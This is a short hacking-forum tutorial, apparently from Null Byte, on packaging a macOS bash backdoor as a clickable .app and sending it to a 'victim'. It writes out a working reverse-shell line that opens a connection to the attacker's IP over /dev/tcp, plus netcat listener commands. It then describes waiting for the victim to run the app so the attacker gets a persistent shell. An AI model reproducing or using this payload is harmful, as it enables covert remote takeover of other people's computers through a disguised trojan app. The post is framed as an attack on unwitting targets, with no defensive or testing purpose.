Header Banner
Null Byte Logo
Null Byte
wonderhowto.mark.png
Cyber Weapons Lab Forum Metasploit Basics Facebook Hacks Password Cracking Top Wi-Fi Adapters Wi-Fi Hacking Linux Basics Mr. Robot Hacks Hack Like a Pro Forensics Recon Social Engineering Networking Basics Antivirus Evasion Spy Tactics MitM Advice from a Hacker

How to Turn a OSX Backdoor into a .App

Hey its August. I dont know why I post so often but I wanted to add up on a post by Cameron Glass here What we are going to do today is turn that backdoor into a .app file so that we dont even need to touch the victims computer! also thanks to someone who helped me with this. (You know who you are)

Create appify.sh

You can get the appify.sh source/here. Compile it into a .sh file and put it into your /~ folder.

Then Get the Backdoor Code

make sure to get the code!

#!/bin/bash

bash -i >& /dev/tcp/youripaddress/1337 0>&1

save as whatever.sh and put it on your desktop.

Use the Appify Script!

then open a new terminal and type ./appify.sh whatever.sh "App-name-here" Check your desktop or your /~ folder and you should find it in one of those. Once done send to the victim.

Before You Send!

Just like in Cameron's tut you need to use netcat witch is built in to kali and mac osx.

If you are on mac type

nc -l 1337

or kali

nc -l -p 1337

Now You Wait for the Victim to Run the App

And once he/she does you should have a shell! Congratulations! And even if they close the app the shell wont close! Thanks to a family member for helping me with this! -August

Apple's iOS 26 and iPadOS 26 updates are packed with new features, and you can try them before almost everyone else. First, check Gadget Hacks' list of supported iPhone and iPad models, then follow the step-by-step guide to install the iOS/iPadOS 26 beta — no paid developer account required.

Related Articles

Comments

No Comments Exist

Be the first, drop a comment!